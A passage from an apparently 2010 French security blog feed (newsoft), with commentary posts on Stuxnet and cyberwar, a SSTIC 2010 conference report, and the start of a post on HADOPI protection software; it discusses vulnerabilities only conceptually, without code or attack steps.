EasyDNS, Paypal, MasterCard, Visa, … dans le cas présent).&lt;br /&gt;&lt;br /&gt;Sans rentrer dans des scénarios trop compliqués, on imagine assez aisément que si demain un secrétaire d'état américain demande à l'ICANN, Microsoft, VeriSign, Cisco, et tous les opérateurs &lt;a href="http://en.wikipedia.org/wiki/Tier_1_network#List_of_tier_1_networks"&gt;Tier-1&lt;/a&gt; américains de bloquer les infrastructures d'un pays occidental, le résultat risque d'être assez catastrophique … et ce sans utiliser un seul virus !&lt;br /&gt;&lt;br /&gt;Tout comme la redirection de l'Internet mondial au travers d'un opérateur chinois pendant une vingtaine de minutes (&lt;a href="http://bgpmon.net/blog/?p=282"&gt;avril 2010&lt;/a&gt;) expose une autre fragilité rarement abordée dans les cyberdoctrines: BGP.&lt;br /&gt;&lt;h3&gt;Conclure sur StuxNet&lt;/h3&gt;Le sabotage informatique est une activité à peu près aussi ancienne que l'informatique. En 1982 déjà, &lt;a href="http://en.wikipedia.org/wiki/Siberian_pipeline_sabotage"&gt;l'explosion d'un pipeline russe&lt;/a&gt; a très probablement été provoquée par le sabotage d'un système SCADA par la CIA. On doit pouvoir trouver des exemples similaires du côté de la fusée Ariane, même s'ils ne sont pas sur Wikipedia.&lt;br /&gt;&lt;br /&gt;Aujourd'hui le PC sous Windows XP est effectivement devenu le consommable de base qui permet de contrôler &lt;a href="http://www.flickr.com/photos/11273706@N07/"&gt;à peu près tout et n'importe quoi&lt;/a&gt;. Un sabotage réussi aura toutes les chances d'impliquer de l'informatique à un moment ou un autre. Mais cela n'a rien de "magique" ou d'exceptionnel: c'est un métier !&lt;br /&gt;&lt;br /&gt;Il est déjà assez simple (dans la plupart des cas) d'analyser des systèmes "fermés", comme le démontrent toutes les conférences de sécurité ces 15 dernières années, au cours desquelles les sujets les plus divers ont été abordés: logiciels propriétaires bien sûr, mais aussi faiblesses de conception des architecture PC, modems/routeurs, téléphones, consoles de jeu, radiocommunications comme le GSM ou le RDS/TMC, puces RFID, TPM, satellites, etc.&lt;br /&gt;&lt;br /&gt;Si un &lt;a href="http://fr.wikipedia.org/wiki/George_Hotz"&gt;étudiant&lt;/a&gt; arrive à pirater l'iPhone et la PlayStation 3 (avec un hyperviseur matériel conçu par IBM), on peut supposer que n'importe qui est capable de pirater un système SCADA avec &lt;a href="http://shop.ebay.com/?_nkw=siemens+plc&amp;amp;_sacat=See-All-Categories"&gt;très peu de moyens&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Mais si j'étais demain à la tête de l'opération "StuxNet 2", je ne m'embarrasserais pas des détails. Avec ses &lt;a href="http://fr.wikipedia.org/wiki/Siemens_%28entreprise%29"&gt;427,000 collaborateurs&lt;/a&gt;, on peut supposer qu'il n'est pas trop difficile de pénétrer le réseau interne de Siemens. Il suffit ensuite d'aller y chercher la documentation et les codes sources nécessaires. Comme 100% des tests d'intrusion internes sont couronnés de succès, il n'est pas trop difficile d'être optimiste.&lt;br /&gt;&lt;br /&gt;La présentation donnée par &lt;a href="https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Smith"&gt;Val Smith lors de BlackHat 2010&lt;/a&gt; sur le dynamisme de la "scène" chinoise permet de se rendre compte à quel point de telles opérations sont monnaie courante ... même si personne n'en parle.&lt;br /&gt;&lt;h3&gt;Conclusion&lt;/h3&gt;Avant de coller le préfixe "cyber" à toutes les sauces, il est recommandé de &lt;a href="http://willusingtheprefixcybermakemelooklikeanidiot.com/"&gt;passer le test suivant&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Car si une chose telle que la "cyberguerre" existe, elle ne ressemble ni à un DDoS, ni à StuxNet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-577689251725282424?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/577689251725282424/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=577689251725282424' title='18 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/577689251725282424'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/577689251725282424'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/12/cyberwar-aftermath.html' title='CyberWar AfterMath'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7171829531475935196</id><published>2010-10-04T08:00:00.022+02:00</published><updated>2010-10-05T21:33:04.756+02:00</updated><title type='text'>L'échec de la CyberGuerre</title><content type='html'>Il n'est pas besoin d'introduire le "fameux" ver &lt;a href="http://en.wikipedia.org/wiki/Stuxnet"&gt;Stuxnet&lt;/a&gt;, tant les médias (y compris généralistes) se sont gargarisés de cette attaque.&lt;br /&gt;&lt;br /&gt;Maintenant que les souches sont &lt;a href="http://forums.malwarebytes.org/index.php?showtopic=63515"&gt;disponibles sur Internet&lt;/a&gt;, ainsi que des &lt;a href="http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf"&gt;analyses techniques&lt;/a&gt; très détaillées, il m'est possible d'avancer quelques réflexions étayées sur le sujet.&lt;br /&gt;&lt;br /&gt;Ce ver représente l'échec flagrant de la CyberGuerre, autre sujet d'actualité s'il en est.&lt;br /&gt;&lt;br /&gt;Tout d'abord, commençons par une assertion totalement invérifiable: ce ver ciblerait une installation nucléaire iranienne. Brillante idée. Soit il s'agit d'endommager une vanne ou une pompe - ce qui se répare en quelques jours. Soit il s'agit de provoquer l'explosion de la centrale: un nouveau Tchernobyl en quelque sorte …&lt;br /&gt;&lt;br /&gt;Notons que &lt;a href="http://www.f-secure.com/weblog/archives/00002040.html"&gt;d'après F-Secure&lt;/a&gt;, la plateforme &lt;a href="http://en.wikipedia.org/wiki/Deepwater_Horizon"&gt;DeepWater Horizon&lt;/a&gt; utilisait les mêmes équipements Siemens PLC … Il ne faut pas en tirer de conclusions hâtives, mais sachant que ce ver va tourner pendant quelques années (les clés USB étant le vecteur d'infection numéro un aujourd'hui), on peut facilement imaginer que les dommages à venir risquent d'être importants … et imprévisibles.&lt;br /&gt;&lt;br /&gt;Un code malveillant comme Stuxnet s'apparente à une arme bactériologique: même s'il semble verrouillé sur une cible donnée, sa propagation est globalement incontrôlable, et les dommages collatéraux peuvent être largement supérieurs à l'intérêt tactique de l'attaque. Il faut avoir des testicules en titane pour lâcher une telle bombe dans la nature, et espérer que ses propres systèmes – ni ceux de ses alliés – ne seront affectés ni par le ver lui-même, ni par les failles révélées (comme le &lt;a href="http://www.wired.com/threatlevel/2010/07/siemens-scada/"&gt;mot de passe Siemens en dur&lt;/a&gt;, qui ne peut toujours pas être changé).&lt;br /&gt;&lt;br /&gt;Regardons maintenant les dommages collatéraux de Stuxnet:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Faille "LNK" (&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx"&gt;MS10-046&lt;/a&gt;).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Cette faille ayant été corrigée en août 2010, les systèmes &lt;a href="http://support.microsoft.com/gp/lifeselect"&gt;Windows XP antérieurs au SP3&lt;/a&gt; (ainsi que les Windows XP Embedded compilés avant cette date) resteront éternellement vulnérables à cette faille d'exécution de code depuis une clé USB.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Faille "Spooler" (&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx"&gt;MS10-061&lt;/a&gt;).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Celle-là ne compte pas, car elle avait déjà été &lt;a href="http://newsoft-tech.blogspot.com/2010/09/ms10-061-this-is-not-0day-you-are.html"&gt;publiée dans le magazine Hakin9&lt;/a&gt; il y a un an et demi. Il faut croire que personne au MSRC ne lit la presse "pirate" :)&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Faille(s) d'élévation de privilèges.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Ces failles sont documentées dans les analyses techniques (et même &lt;a href="http://www.immunityinc.com/ceu-index.shtml"&gt;disponibles sur étagère&lt;/a&gt;), mais non corrigées par Microsoft à l'heure où j'écris ces lignes. Il n'y a plus qu'à attendre les malwares qui vont les exploiter.&lt;br /&gt;&lt;br /&gt;Bilan: les risques pour la sécurité informatique mondiale se sont durablement accrus, et la cible a été manquée. Sauf si le seul objectif de ce ver était d'augmenter les budgets alloués aux SCADA et à la CyberGuerre, bien sûr :) Bienvenue dans le mois du &lt;a href="http://isc.sans.edu/diary.html?storyid=9640"&gt;Cyber Awareness&lt;/a&gt; !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7171829531475935196?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7171829531475935196/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7171829531475935196' title='11 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7171829531475935196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7171829531475935196'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/10/lechec-de-la-cyberguerre.html' title='L&apos;échec de la CyberGuerre'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7707925808211714124</id><published>2010-08-30T08:00:00.004+02:00</published><updated>2010-08-30T21:47:32.993+02:00</updated><title type='text'>Un compte-rendu à froid de SSTIC 2010 (2ème partie)</title><content type='html'>&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;Est-ce qu'on est tous foutus ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La &lt;a href="http://www.sstic.org/2010/presentation/Conference_de_cloture/"&gt;conférence de clôture&lt;/a&gt; du SSTIC s'est aventurée sur de nombreux terrains, sans langue de bois (même si certains messages ont été délivrés à mots couverts). Difficile dans ces conditions de résumer, et surtout de produire une exégèse pertinente sur cette intervention, d'autant que je n'ai pas compris si les opinions personnelles de l'intervenant, ou la doctrine officielle de l'Etat français, y étaient exprimées. Je vais toutefois m'y essayer.&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;Jetons un voile pudique sur l'idée que l'attaque est inutile à la défense. Cette idée a déjà été battue en brèche en séance, puis dans les compte-rendus ultérieurs publiés sur Internet. Je concède toutefois qu'il est inutile de chercher de nouvelles failles tant il en existe déjà. La faiblesse des mécanismes d'authentification dans les systèmes Windows est un problème déjà largement insoluble (attaque dite &lt;i&gt;&lt;a href="http://oss.coresecurity.com/projects/pshtoolkit.htm"&gt;pass the hash&lt;/a&gt;&lt;/i&gt;, entre &lt;a href="http://secgroup.ext.dsi.unive.it/kerberos/"&gt;autres&lt;/a&gt;).&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;Ce qui m'a le plus frappé, c'est d'entendre que face aux échecs flagrants et répétés de la sécurité informatique, l'une des solutions proposées consistait à déployer massivement des &lt;a href="http://fr.wikipedia.org/wiki/Syst%C3%A8me_de_d%C3%A9tection_d'intrusion"&gt;IDS&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Les IDS faisant partie des échecs les plus retentissants dans l'industrie de la sécurité, cette assertion a de quoi surprendre. Et pourtant elle est parfaitement justifiée, car son auteur ne cherche pas à protéger les systèmes, mais simplement à faire prendre conscience aux responsables de ces systèmes de l'étendue du désastre.&lt;br /&gt;&lt;br /&gt;Je reste malgré tout circonspect. L'échec commercial des IDS, outre les limitations techniques des produits existants, s'explique aussi par la recherche de l'ataraxie. Pour exploiter un IDS, il faut engager des personnes compétentes dédiées au traitement des alertes, mettre en place des procédures, éventuellement impacter la production par du &lt;i&gt;forensics&lt;/i&gt;, et toutes sortes de choses désagréables du même acabit. Dans ces conditions, ne rien voir est beaucoup plus confortable ^H^H^H beaucoup moins cher.&lt;br /&gt;&lt;br /&gt;Dans le cas contraire, et comme le rappelle Michal Zalewski dans un &lt;a href="http://lcamtuf.blogspot.com/2010/06/intrusion-detection-doing-it-wrong.html"&gt;billet original&lt;/a&gt;, quelques astuces permettent de réaliser un IDS du pauvre, pour peu que l'emplacement des "pièges" ne soit pas divulgué.&amp;nbsp;Le plus cher dans la détection d'intrusion reste le traitement de l'incident, pas sa remontée. Déployer des IDS n'est que la première étape, que beaucoup n'ont jamais franchie. &lt;i&gt;Wait and see&lt;/i&gt;.&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;L'impasse dans laquelle se trouvent actuellement toutes les personnes en charge de la protection des systèmes s'explique par quelques fondamentaux déjà rappelés sur ce blog.&lt;br /&gt;&lt;br /&gt;Le principal problème est que l'informatique grand public (ce qui couvre le matériel - ordinateurs personnels et téléphones mobiles, le logiciel, et les contenus/services disponibles) a complètement échappé à toute forme de contrôle par les clients finaux, y compris l'Etat.&lt;br /&gt;&lt;br /&gt;Outre les exemples d'Apple et Google qui n'en font qu'à leur tête dans tous les domaines (ex. &lt;a href="http://www.businessmobile.fr/actualites/l-europe-se-penche-sur-la-fermeture-des-produits-apple-et-notamment-de-l-iphone-39752979.htm"&gt;interopérabilité&lt;/a&gt; pour le premier et &lt;a href="http://www.lemonde.fr/technologies/article/2009/09/04/livre-numerique-le-ton-monte-entre-google-amazon-et-les-auteurs-americains_1236044_651865.html"&gt;contenus numériques&lt;/a&gt;&amp;nbsp;pour le deuxième), on peut également rappeler que :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La loi est tout simplement bafouée par les &lt;a href="http://fr.wikipedia.org/wiki/Licence_de_logiciel"&gt;CLUF&lt;/a&gt;. Toutes les protections basiques du consommateur (ex. vices cachés) ne sont jamais appliquées aux logiciels.&lt;/li&gt;&lt;li&gt;Le budget de l'ANSSI est de &lt;a href="http://www.clubic.com/actualite-287332-anssi-labelise-produits-securite-informatique.html"&gt;90 millions d'euros&lt;/a&gt;, alors que les simples revenus publicitaires de Google étaient de l'ordre de&amp;nbsp;&lt;a href="http://en.wikipedia.org/wiki/Google#Advertising"&gt;10 milliards de dollars&lt;/a&gt; ... en 2006.&lt;/li&gt;&lt;li&gt;Comme le déplore l'intervenant, notre dépendance aux technologies étrangères est totale.&lt;/li&gt;&lt;/ul&gt;Par ailleurs, les technologies de l'information sont devenues une commodité, ce qui entretient dans l'esprit du grand public (j'entends par là toute personne dont l'informatique n'est pas le métier - ce qui s'étend jusqu'au plus haut niveau de l'Etat ...) que "ça marche tout seul" et "les constructeurs font plutôt bien leur boulot".&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;Légiférer est l'un de seuls pouvoirs de l'Etat qui pourrait le distinguer d'un client ordinaire.&lt;br /&gt;&lt;br /&gt;Mais force est de constater que le droit ne s'applique pas aux technologies de l'information – ou du moins pas de la même manière. Et que l'inflation des lois applicables aux nouvelles technologies s'effectue souvent en dépit du bon sens (HADOPI, LOPPSI et autres ayant déjà été largement traitées &lt;a href="http://news0ft.blogspot.com/2010/08/interlude-dactualite.html"&gt;par ailleurs&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;Sur Internet, le seul pouvoir est médiatique (effet de &lt;i&gt;buzz&lt;/i&gt;). La CNIL avec ses contrôles en use habilement. Mais il me semble que les institutions étrangères restent meilleures que les nôtres dans ce domaine.&lt;br /&gt;&lt;br /&gt;Il suffit de comparer les prises de position très claires du &lt;a href="https://www.bsi.de/"&gt;BSI&lt;/a&gt;&amp;nbsp;allemand sur &lt;a href="http://www.pcinpact.com/actu/news/58709-allemagne-blackberry-iphone-certa-securite.htm"&gt;BlackBerry&lt;/a&gt; (un serpent de mer de la sécurité des Etats s'il en est).&amp;nbsp;En France j'ai vaguement l'impression que chacun cherche au contraire à obtenir et à contrôler l'information – pour assurer sa supériorité sur son voisin ? – ce qui ne sert pas l'intérêt général mais alimente au contraire la rumeur, jusqu'à effacer les arguments techniques.&lt;br /&gt;&lt;br /&gt;Le même phénomène s'est également produit avec &lt;a href="http://www.urec.cnrs.fr/rubrique216.html"&gt;Skype&lt;/a&gt;. Je porte d'ailleurs de grands espoirs sur la prochaine conférence CCC, où des &lt;a href="http://techcrunch.com/2010/07/08/skypes-innermost-security-layers-claimed-to-be-reverse-engineered/"&gt;révélations sur Skype&lt;/a&gt; pourraient avoir lieu, tout comme ce fût le cas pour BlackBerry lors d'une &lt;a href="http://events.ccc.de/congress/2005/fahrplan/events/596.en.html"&gt;édition antérieure&lt;/a&gt;. La vérité vient toujours d'ailleurs ...&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;Au final, culture de l'ambiguïté, contrôle de l'information et évangélisation de niveau zéro auprès des administrations ne font pas rêver les &lt;i&gt;hackers&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Mes seuls rapports avec l'Etat 2.0 se limitent au paiement des impôts et des amendes (en attendant les emails d'avertissement HADOPI). Mais je sens s'éloigner le jour où je surferai sur l'Internet mondial (le vrai, pas celui des sites "&lt;a href="http://microfail.blogspot.com/2010/01/internet-par-orange.html"&gt;autorisés&lt;/a&gt;") avec les résultats du projet &lt;a href="http://secsi.adullact.net/"&gt;SECSI&lt;/a&gt;. Le projet &lt;a href="http://qubes-os.org/Home.html"&gt;Qubes&lt;/a&gt; aura probablement été industrialisé avant, malgré son &lt;a href="http://lists.immunitysec.com/pipermail/dailydave/2010-August/006171.html"&gt;inutilité fondamentale&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Ajouté au fait que les carrières proposées sont médiocres (CDD 3 ans), et que les perspectives offertes à long terme sont du réseautage plus ou moins obscur, on peut comprendre les difficultés de recrutement de l'Etat dans le domaine de la SSI. Ainsi que le problème du &lt;a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html"&gt;maintien des compétences&lt;/a&gt; en France, comme le déplore régulièrement &lt;a href="http://security-labs.org/fred/"&gt;Fred Raynal&lt;/a&gt; dans ses &lt;a href="http://www.miscmag.com/"&gt;éditos&lt;/a&gt;.&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;Afin de ne pas être taxé de nihiliste invétéré, voici deux idées qui peuvent réellement changer la face de la sécurité informatique.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;1. Appliquer les règles.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Le problème est qu'en France, on cherche à contourner les règles plutôt qu'à les adapter. Or si une règle est inapplicable, c'est qu'elle ne sert à rien ...&amp;nbsp;Cela va du très ancien "tous les supports amovibles introduits dans la société doivent être scannés par le sas antivirus" jusqu'au très récent "l'usage des réseaux sociaux est interdit".&lt;br /&gt;&lt;br /&gt;En ce sens, la lecture des avis du CERTA me procure toujours le même plaisir qu'à&amp;nbsp;&lt;a href="http://expertmiami.blogspot.com/2008/02/cest-pour-des-raisons-comme-ca.html"&gt;Kostya&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Que penser de ces délicieuses &lt;a href="http://www.certa.ssi.gouv.fr/site/CERTA-2010-ALE-012/index.html"&gt;méthodes de contournement&lt;/a&gt; (&lt;i&gt;workarounds&lt;/i&gt;) pour une faille dans Adobe Reader exploitée en "0day" dans la nature :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;i&gt;(...)&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;convertir les fichiers suspects au format PS&amp;nbsp;puis de nouveau au format PDF sur une machine sas ;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;n'ouvrir que des fichiers provenant de sources vérifiées et sûres.&lt;/i&gt;&lt;/li&gt;&lt;/ul&gt;Sachant qu'il existe à tout instant au moins une faille connue et exploitée en "0day" dans Adobe Reader (&lt;a href="http://www.vupen.com/english/research-vuln.php"&gt;VUPEN&lt;/a&gt; ayant décidé de &lt;a href="http://www.h-online.com/security/news/item/Microsoft-vulnerabilities-full-disclosure-and-no-disclosure-1033551.html"&gt;ne plus informer les éditeurs&lt;/a&gt;&amp;nbsp;;), je vous laisse le soin de trouver un outil de conversion PDF vers PostScript qui ne soit pas lui-même vulnérable ... et de déployer cette préconisation de manière permanente à l'échelle d'une entreprise.&lt;br /&gt;&lt;br /&gt;Le seul moyen de produire des règles applicables ... c'est de se les appliquer à soi-même. Car on ne devrait pas être plus exigeant avec les autres qu'on ne l'est avec soi-même. Et là encore, la France est championne de "l'exception VIP" (tout en restant dans le domaine de la sécurité informatique et pas celui de la fraude fiscale).&lt;br /&gt;&lt;br /&gt;&lt;i&gt;2. Mettre en place un contrôle sanitaire sur les logiciels.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;J'approuve complètement le principe du CSPN. Mais à l'heure où j'écris ces lignes, seule &lt;a href="http://www.ssi.gouv.fr/site_rubrique54.html"&gt;une poignée de logiciels&lt;/a&gt; totalement inexistants en entreprise a été certifiée. Certifier 10 logiciels en 3 ans, c'est tenter d'éponger l'océan de l'industrie logicielle avec un coton-tige.&lt;br /&gt;&lt;br /&gt;On objectera que les ressources nécessaires seraient titanesques. Mais dans ce cas, pourquoi ne pas mutualiser les travaux réalisés de manière indépendante et en doublon par tous les acteurs du marché ?&lt;br /&gt;&lt;br /&gt;Il suffirait pour cela de réglementer la profession d'auditeur en sécurité, et de déposer tous les rapports d'audit dans un "pot commun" accessible à tous. Ainsi un auditeur pourrait faire bénéficier ses clients de l'expertise antérieure de ses pairs. Voilà qui éviterait de refaire auditer cent fois le même produit, avec des résultats très aléatoires selon l'intervenant ... Et au final, profiter de l'effet de &lt;i&gt;buzz &lt;/i&gt;pour obliger les éditeurs à s'améliorer.&lt;br /&gt;&lt;br /&gt;Bien sûr, on peut aussi suspecter que la quasi-totalité des logiciels commerciaux échoueraient à une certification sécurité, même de "premier niveau". Et c'est bien là le drame.&lt;br /&gt;&lt;br /&gt;Dans le registre des idées plus farfelues, après avoir dépensé 1 milliard d'euros pour vacciner contre la grippe A, ne serait-il pas judicieux de mettre en place des centres de &lt;a href="http://www.pandasecurity.com/france/homeusers/downloads/usbvaccine/"&gt;vaccination pour clés USB&lt;/a&gt; ? Cela permettrait de protéger la population (et les entreprises) contre le vecteur d'infection n°1 aujourd'hui ...&lt;br /&gt;&lt;br /&gt;Autre idée: interdire complètement l'utilisation de tout langage de programmation non sûr (qui a dit&amp;nbsp;&lt;a href="http://news0ft.blogspot.com/2009/04/rien-nest-laisse-au-hasard.html"&gt;PHP&lt;/a&gt;&amp;nbsp;? ;), y compris dans les écoles. Vous pensez que je vais trop loin ? C'est pourtant ce que les américains&amp;nbsp;&lt;a href="http://www.cra.org/govaffairs/blog/2010/08/cybersecurity-rd-in-review/"&gt;s'apprêtent à voter&lt;/a&gt;.&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;Enfin, pour conclure sur une note positive, et contrairement à ce que j'ai pu &lt;a href="http://blog.esiea-recherche.eu/2010/06/conference-de-cloture-du-sstic-2010.html"&gt;lire ailleurs&lt;/a&gt;, je sais de source sûre que l'Etat recrute d'anciens &lt;i&gt;hackers&lt;/i&gt; en dehors des écoles dites "groupe A". Du moins si par "&lt;i&gt;hacker&lt;/i&gt;" on entend "personne compétences en informatique qui maitrise tous les aspects de son art, y compris les plus obscurs". C'est toujours ça de pris.&lt;br /&gt;&lt;br /&gt;Les commentaires sont ouverts ! :)&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Arial; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7707925808211714124?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7707925808211714124/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7707925808211714124' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7707925808211714124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7707925808211714124'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/08/un-compte-rendu-froid-de-sstic-2010.html' title='Un compte-rendu à froid de SSTIC 2010 (2ème partie)'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4381659289609796536</id><published>2010-08-12T08:00:00.002+02:00</published><updated>2010-08-12T08:00:03.031+02:00</updated><title type='text'>Interlude d'actualité</title><content type='html'>"&lt;i&gt;Un peuple qui a quarante mille lois n'a pas de loi.&lt;/i&gt;"&lt;br /&gt;– Honoré de Balzac&lt;br /&gt;&lt;br /&gt;En attendant la deuxième partie de mon &lt;a href="http://news0ft.blogspot.com/2010/06/un-compte-rendu-froid-de-sstic-2010.html"&gt;compte-rendu du SSTIC&lt;/a&gt;, je ne peux pas m'empêcher de commenter l'actualité récente. Et je ne parle pas de la faillite du site &lt;a href="http://jiwa.fr/"&gt;Jiwa&lt;/a&gt; (dont &lt;a href="http://sid.rstack.org/blog/index.php/426-hadopi-ou-l-echec-du-paysage-culturel-numerique-francais"&gt;Sid&lt;/a&gt; s'est très bien fait l'écho), même si mon sujet est connexe : il s'agit du cahier des charges afférent aux Mesures Techniques de Protection, censées protéger l'internaute des foudres d'HADOPI.&lt;br /&gt;&lt;br /&gt;Bien que ce document soit marqué "confidentiel - ne pas diffuser" et distribué au compte-gouttes, &lt;a href="http://www.numerama.com/magazine/16363-exclusif-le-document-secret-de-l-hadopi-sur-les-moyens-de-securisation.html"&gt;Numerama&lt;/a&gt; s'est néanmoins permis de le publier en accès libre – ce qui permet de le commenter. Espérons que chaque copie ait été "watermakée" :)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://news0ft.blogspot.com/2009/05/un-avis-dexpert-sur-hadopi.html"&gt;Comme prévu&lt;/a&gt;, les solutions envisagées sont :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;soit l'installation d'un logiciel sur le poste de l'utilisateur ;&lt;/li&gt;&lt;li&gt;soit l'installation d'un logiciel dans la Box du client.&lt;/li&gt;&lt;/ul&gt;Et comme cela était malheureusement prévisible, il n'est pas fait mention de la sécurité des processus de développement, ni des méthodes de vérification/certification applicables. On s'oriente donc à nouveau vers des logiciels développés en C (ou en PHP) par des stagiaires, avec tous les risques (&lt;a href="http://bluetouff.com/2010/06/14/hadopi-et-failware-de-securisation-orange/"&gt;démontrés&lt;/a&gt;) que cela comporte. Cela promet néanmoins des développements juridiques intéressants.&lt;br /&gt;&lt;br /&gt;Mais compte-tenu du fait que les premiers emails seront envoyés bien avant la disponibilité de ces fameux outils de protection, on peut compter sur le fait que l'ensemble des internautes concernés feront profil bas … gratuitement et sans risque !&lt;br /&gt;&lt;br /&gt;La mise à disposition d'un logiciel destiné aux postes Windows est de toute façon inutile : il restera possible de regarder du &lt;i&gt;streaming &lt;/i&gt;sur son iPad, et Apple refusera de signer et/ou diffuser l'application HADOPI, conformément à sa politique. Il restera donc à légaliser le &lt;i&gt;&lt;a href="http://www.macbidouille.com/news/2010/07/26/le-dmca-est-assoupli-le-jailbreak-devient-legal"&gt;jailbreaking&lt;/a&gt; &lt;/i&gt;en France et à diffuser l'application HADOPI sur &lt;a href="http://cydia.saurik.com/"&gt;Cydia&lt;/a&gt; :)&lt;br /&gt;&lt;br /&gt;L'intégration à la Box du client est une solution plus intéressante. Elle est toutefois trivialement contournable, puisque rien n'oblige le client à utiliser la Box de son FAI. Ni à utiliser le logiciel fourni par son FAI, le logiciel de la &lt;a href="http://www.efixo.com/neufbox4/freesoftware/"&gt;NeufBox 4&lt;/a&gt; étant par exemple recompilable presque entièrement à partir des sources. Sauf à placer un &lt;a href="http://fr.wikipedia.org/wiki/Trusted_Platform_Module"&gt;TPM&lt;/a&gt; dans chaque Box, il sera donc impossible de contrôler l'équipement de connexion utilisé par les clients.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;*&lt;/div&gt;&lt;div style="text-align: center;"&gt;* *&lt;/div&gt;&lt;br /&gt;Une autre actualité intéressante est la &lt;a 